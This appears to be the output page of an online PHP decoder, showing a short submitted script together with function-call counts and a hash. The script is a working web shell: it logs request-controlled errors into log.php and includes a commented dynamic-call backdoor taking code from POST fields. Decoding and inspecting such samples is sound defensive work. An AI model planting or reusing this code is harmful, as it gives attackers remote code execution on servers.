Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(E_ALL); ini_set("log_errors", "On"); ini_set("error_log","log.php..
Decoded Output download
<?php
error_reporting(E_ALL);
ini_set("log_errors", "On");
ini_set("error_log","log.php");
$arr=array();
var_dump($arr[$_REQUEST['x']]);
//$Exp=$_POST['x'];$Exp($_POST['z0']); ?>
Did this file decode correctly?
Original Code
<?php
error_reporting(E_ALL);
ini_set("log_errors", "On");
ini_set("error_log","log.php");
$arr=array();
var_dump($arr[$_REQUEST['x']]);
//$Exp=$_POST['x'];$Exp($_POST['z0']);
Function Calls
| ini_set | 2 |
| var_dump | 1 |
| error_reporting | 1 |
Stats
| MD5 | 2db0b32b849050eef966a38b8c8c1d1a |
| Eval Count | 0 |
| Decode Time | 85 ms |